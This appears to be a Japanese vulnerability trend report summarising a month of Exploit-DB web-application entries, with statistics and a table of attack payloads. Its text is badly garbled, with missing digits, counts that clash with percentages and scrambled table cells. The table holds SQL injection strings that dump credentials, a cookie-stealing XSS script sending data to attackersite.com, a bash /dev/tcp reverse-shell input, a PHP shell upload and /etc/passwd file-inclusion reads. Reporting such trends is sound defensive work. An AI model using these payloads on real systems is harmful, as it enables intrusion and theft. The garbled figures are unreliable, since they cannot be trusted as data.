06.0
サマリー EDB-Report 最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 0 月に公開された Exploit-DB の分析結果 SQL インジェクション攻撃に対する脆弱報告件数が最も多く 攻撃の種類も多数発見されました SQL インジェクション攻撃は 最初は難易度が低い攻撃としても 一応が発見されたら そのを悪用して多様な攻撃ができる非常に高い危険度を持っている攻撃に属します SQL インジェクションにさらされないためには 入力値の検証を厳密に実施するセキュアコーディングが必須的に求められます 主なソフトウェアの発生現況を見ると 0 月には CMS から スクリプトまで多様なソフトウェアからが発見されました が発見されたソフトウェアを使用する管理者は 該当の内容を必ず確認し 関連アップデートを実施してにさらされないように注意しなければなりません. 別件数 カテゴリ 件数 ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) リモートコマンドインジェクション (Remote Command Execution) SQL インジェクション (SQL Injection) 3 クロスサイトスクリプティング (Cross Site ing : XSS) 合計 48 5 0 5 0 5 0 ファイルアップロード (File Upload) 別件数 3 ローカルファイル挿入リモートコマンドインジェクション SQL インジェクション (Local File Inclusion:LFI) (Remote Command (SQL Injection) クロスサイトスクリプティング (Cross Site ing : Execution) XSS). 危険度別件数 危険度 件数 割合 早急対応要 5 0.4% 高 43 89.58% 合計 48 00.00% 危険度別件数 43 5 早急対応要 高 3. 攻撃実行の難易度別件数難易度 件数 割合 難 4 8.33% 中 9 8.75% 易 35 7.9% 合計 48 00.00% 攻撃実行の難易度別件数 4 9 35 難 中 易 4. 主なソフトウェア別発生件数 ソフトウェア名 件数 PPS-0-S Q3V 4 Image Business Blog Rental Dynamic Web Picosafe Entrepreneur Job Portal Thatware Event Calendar Press Release Fashion School Full CBT FreePBX Application Health Record Witbe Ap MicroBlog Categorizator JonhCMS Rental Ap MicroCMS S9Y Serendipity CNDSOFT Learning Management Forum XhP CMS Student Information Advance MLM Web Based Alumni Tracking OpenCimetiere Colorful Blog BB Portal miniblog MLM Unilevel Plan 合計 48 主なソフトウェア別発生件数 4 PPS-0-S Q3V Image Business Blog Rental Dynamic Web
最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 /picosafe_webgui/webinterface/js/filemanager/filemanage 06-0-05 40454 XSS 中 高 Picosafe Web Gui - r.php?directory=phnjcmlwdd5hbgvydcgxkts8l3njcmlwd Picosafe Web Picosafe filemanager.php XSS D4= Gui 06-0-06 40468 SQL Injection 易 高 06-0-06 40467 SQL Injection 易 高 06-0-06 40466 SQL Injection 中 高 06-0-06 40470 SQL Injection 易 高 06-0-06 40469 SQL Injection 難 早急対応要 /advancedbb/viewproduct.php?pid=94%7%0and%0754=754%0 BB Portal - viewproduct.php SQL Injection 脆弱 AND%0%7whqn%7=%7whqn 性 Rental - Blind SQL Injection Advance MLM - SQL Injection - restaurants-details.php SQL Injection MLM Unilevel Plan v.0. - news_detail.php SQL Injection /product_details.php?refid=395887%7%0and% 039=39%0AND%0%7HTMi%7=%7HTMi /mlm/news_detail.php?newid=jmctrq%7%0union% 0ALL%0SELECT%0NULL,CONCAT(0x7787a7a7,0x4 8755657878776796667664866474474844b655 564f54370537747504c6e73687666550,0x7787877 ),NULL,NULL,NULL,NULL--%0Afye /jus/restaurants-details.php?fid=%0and%0=-- /news_detail.php?newid=%7%0%f*%30000an d%0ascii%8substring%8%8database%8%9%9 %C4%C%9%9%3C5%0and*%F%0%7x %7%3D%7x BB Portal Rental Advance MLM Just Dial Clone MLM Unilevel Plan BB Portal Rental Advance MLM MLM Unilevel Plan v.0. 06-0-06 4046 Remote Command Execution 中早急対応要 Witbe - Remote Code Execution POST /cgi-bin/applyconfig.pl HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Witbe Witbe file=set bash -i >& /dev/tcp/ 0>& 06-0-06 40470 XSS 易高 06-0-07 40479 SQL Injection 難早急対応要 - /jus/restaurants-details.php?fid=<script>alert();</script> restaurants-details.php XXS /job-portal/jobsearch_all.html?cmpid=345355536' AND (SELECT 8347 FROM(SELECT Entrepreneur Job Portal - COUNT(*),CONCAT(0x76a7a7a7,(SELECT jobsearch_all.html SQL Injection (ELT(8347=8347,))),0x77876b7,FLOOR(RAND(0)*)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjf'='tqjf Just Dial Clone Entrepreneur Job Portal Entrepreneur Job Portal 06-0-09 40480 XSS 中高 miniblog.0. - admin.php XSS POST /miniblog/adm/admin.php?mode=add&id=%3cbr%0/% 3E%3Cb%3ENotice%3C/b%3E:%0%0Undefined%0 variable:%0post%0in%0%3cb%3ec:\\\\xampp \\\\htdocs\\\\miniblog\\\\adm\\\\edit.p hp%3c/b%3e%0on%0line%0%3cb%3e8%3c/b% 3E%3Cbr%0/%3E HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 miniblog miniblog.0. data[post_title]=<script>location.href = â http://www.attackersite.com/stealer.php?cookie=â +document.cookie;</script> 06-0-09 40487 XSS 易高 Press Release - administration.php XSS /phppressrelease/administration.php?pageaction=saverele ase&subaction=submit&dateday=&datemonthnewedit=&d ateyearnewedit=&title=<script>alert('exploit- DB')<%Fscript>&summary=deneme&releasebody=denem e&categorynewedit=&publish=active Press Release Press Release 06-0- 40505 XSS 易高 06-0- 4053 SQL Injection 易高 Ap MicroBlog.0. - index.php XSS OpenCimetiere v3.0.0-a5 - login.php SQL Injection POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 task=publish_comment&article_id=69&user_id=&commen t_user_name=<script>alert(7);</script>&comment_user_e mail=besimweptest@yopmail.com&comment_text=besim& captcha_code=dkf8&btnsubmitpc=publish your comment POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 login.action.connect=se%0connecter&came_from=&logi n=%0and%0=--&password=passw0rd Ap MicroBlog OpenCimetier e Ap MicroBlog.0. OpenCimetier e v3.0.0-a5
最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 06-0- 4056 XSS 易 高 Ap MicroCMS 3.9.5 - Chrome/6.0.9.75 Safari/535.7 Ap Ap index.php XSS MicroCMS MicroCMS 3.9.5 comment_user_name=<svg/onload=prompt(7);//> 06-0- 405 SQL Injection 易高 06-0-3 4056 XSS 易高 Categorizator 0.3. - vote.php SQL Injection Colorful Blog - single.php XSS /cms/categorizator/vote.php?id_site='%0and%0''=' ' Categorizator POST /single.php?kat=kat&url='post_name' HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Colorful Blog Categorizator 0.3. Colorful Blog adsoyad=<script>alert('document.cookie')</script>&email= besim@yopmail.com&web=example.com&mesaj=nice, blog post 06-0-3 4059 SQL Injection 易高 06-0-3 4058 XSS 易高 Blog.0 - /blog/admin.php?act=editpost&id='+order+by+999--+ admin.php SQL Injection Blog.0 - Multiple Vulnerabilities POST /blog/admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Blog Blog Blog.0 Blog.0 06-0-3 40530 SQL Injection 易 高 06-0-3 405 SQL Injection 易 高 06-0-4 4053 SQL Injection 易 高 06-0-4 40547 SQL Injection 易 高 act= addpost&publish_date=06-0-3 0:30:7&post_title=<script>alert('XssPoC')</script>&post _text=hacked&post_limit=550 JonhCMS 4.5. - go.php SQL /go.php?id=%0and%0=-- Injection Thatware 0.4.6 - friend.php SQL /friend.php?sid=%0and%0=-- Injection Forum.4 - /admin.php?act=editpost&id='+order+by+999--+ admin.php SQL Injection POST /signin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Health Record 0. - Chrome/6.0.9.75 Safari/535.7 signin.php SQL Injection JonhCMS Thatware Forum Health Record JonhCMS 4.5. Thatware 0.4.6 Forum.4 Health Record 0. 06-0-4 40546 SQL Injection 中高 06-0-4 40545 SQL Injection 易高 Fashion 0. - dd.php SQL Injection Learning Management 0. - login.php SQL Injection lgaid=admin' or ''=' /admin/dd.php?q=- %7%0union%0select%0,version()--+ POST /admin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 username=admin' or ''=' Fashion Fashion 0. Learning Management Learning Management 0. 06-0-4 40544 SQL Injection 中高 06-0-4 40543 SQL Injection 中高 06-0-4 4054 SQL Injection 易高 Dynamic Web 0. - page.php SQL Injection Web Based Alumni Tracking 0. - print_employed.php SQL Injection /page.php?prodid=- 3%7%0union%0select%0,,@@version,4--+ /admin/print_employed.php?id=- %7%0union%0select%0,concat(username,0x3a, password),3,4,5,6,7,8,9,0,,%0from%0user--+ POST /admin_login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Student Information Chrome/6.0.9.75 Safari/535.7 (SIS) 0. - admin_login.php SQL Injection Dynamic Web Web Based Alumni Tracking Student Information Dynamic Web 0. Web Based Alumni Tracking 0. Student Information (SIS) 0. username=admin' or ''=' 06-0-6 4055 XSS 易高 06-0-6 4055 XSS 易高 06-0-7 40559 XSS 易高 - index.php XSS - administration.php XSS Business - index.php XSS /index.php?key=<svg/onload=alert()> /administration.php?key=<svg/onload=alert()> /index.php?key=<svg/onload=alert()>&location=<svg/onl oad=alert()> Business Business
最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 /show.php?show=- %0union%0select%0,username,password,4,5,6,7, 06-0-7 40558 SQL Injection 中 高 School Full CBT 0. - show.php 8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6 School Full School Full SQL Injection,7,8,user(),database(),3,3%0from%0adminlogin-- CBT CBT 0. + 06-0-7 40555 SQL Injection 難 早急対応要 06-0-7 40554 XSS 易 高 06-0-7 40554 XSS 易 高 06-0-7 40559 XSS 易 高 06-0-9 40576 XSS 中 高 /shop/product-details.php?prodid=- 80%7%0union%0select%0,,concat(username,0x Application 0. - productdetails.php SQL Injection 3a,password),4,version(),user()%0from%0user--+ Image - index.php XSS Image - administration.php XSS Business - administration.php XSS XhP CMS 0.5. - action.php XSS /index.php?dateyear=<svg/onload=alert()>&key=<svg/onl oad=alert()> /administration.php?dateyear=<svg/onload=alert()>&key =<svg/onload=alert()> /administration.php?key=<svg/onload=alert()>&location= <svg/onload=alert()> POST /action.php?module=users&action=process_general_confi g&box_id=9&page_id=0&basename=index.php&closewi ndow=&from_page=page=0&box_id=9&action=display_ site_settings&errcode=0 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Application Image Image Business XhP CMS Application 0. Image Image Business XhP CMS 0.5. frmpagetitle="accesskeyzonclick"alert& #40;document.domain 06-0-9 40575 File Upload 易高 CNDSOFT.3 - index.php File Upload POST /ofis/index.php?is=kullanici_tanimla HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream CNDSOFT CNDSOFT.3 06-0-0 40594 SQL Injection 易高 06-0-0 4059 SQL Injection 難早急対応要 <? phpinfo();?> -----------------------------7dd009908f-- /admin.php?act=options&cal_id='+order+by+0--+ Event Calendar.5 - admin.php SQL Injection Rental - viewproducts.php SQL Injection /viewproducts.php?catid=- 9700%7%0OR%0%0GROUP%0BY%0CONCAT (0x77a6707,(SELECT%0(CASE%0WHEN%0(7055 =7055)%0THEN%0%0ELSE%00%0END)),0x76 a76787,floor(rand(0)*))%0having%0min(0)# Event Calendar Rental Event Calendar.5 Rental 06-0- 406 SQL Injection 易高 06-0- 4064 LFI 易高 - categoryview-list.php SQL Injection 脆弱 /category-view-list.php?srch=%0and%0=-- 性 FreePBX 0.3.66 - ajax.php LFI POST /admin/ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 destination=/../../../../../../var/www/html/0x448.php&lan guage= Just Dial Clone FreePBX FreePBX 0.3.66 06-0-3 4060 XSS 易高 07 - form_process.php XSS POST /zenbership/pp-functions/form_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 07 page=&session=zen_076e737b450bbd83f5fc066&first _name=besim&last_name=<>alert('exploitdb')</scrip t>&email=exploit@yopmail.com 06-0-3 4060 XSS 易高 07 - event-add.php XSS POST /admin/cp-functions/event-add.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 07 event[name]=<>alert('meryem-exploitdb');</>
最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 POST /FWUpgrade.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f 06-0-8 4064 XSS 易高 PPS-0-S Q3V - FWUpgrade.php XSS -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="somefile.php<img src=x onerror=confirm()>" Content-Type: text/php PPS-0-S Q3V PPS-0-S Q3V t00t -----------------------------7dd009908f-- 06-0-8 4064 XSS 易 高 06-0-8 4064 XSS 易 高 PPS-0-S Q3V - SensorDetails.php XSS PPS-0-S Q3V - SNMP.php XSS /SensorDetails.php?Menu=SST&DeviceID=C00"><script>a lert()</script> POST /SNMP.php?Menu=SMP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 PPS-0-S Q3V PPS-0-S Q3V PPS-0-S Q3V PPS-0-S Q3V SNMPAgent=Enable&CommuintyString=public&Commuint ywrite=private&trapsversion=vtrap&ip=9.68.0.54'; alert(3) 06-0-8 4064 LFI 易 高 06-0-3 40650 XSS 易 高 PPS-0-S Q3V - ListFile.php LFI /ListFile.php?file=../../../../../../../etc/passwd POST /serendipity_admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 S9Y Serendipity.0.4 - Chrome/6.0.9.75 Safari/535.7 serendipity_admin.php XSS 脆弱 性 PPS-0-S Q3V S9Y Serendipity PPS-0-S Q3V S9Y Serendipity.0.4 serendipity[body]=<>alert('meryem ExploitDB')</>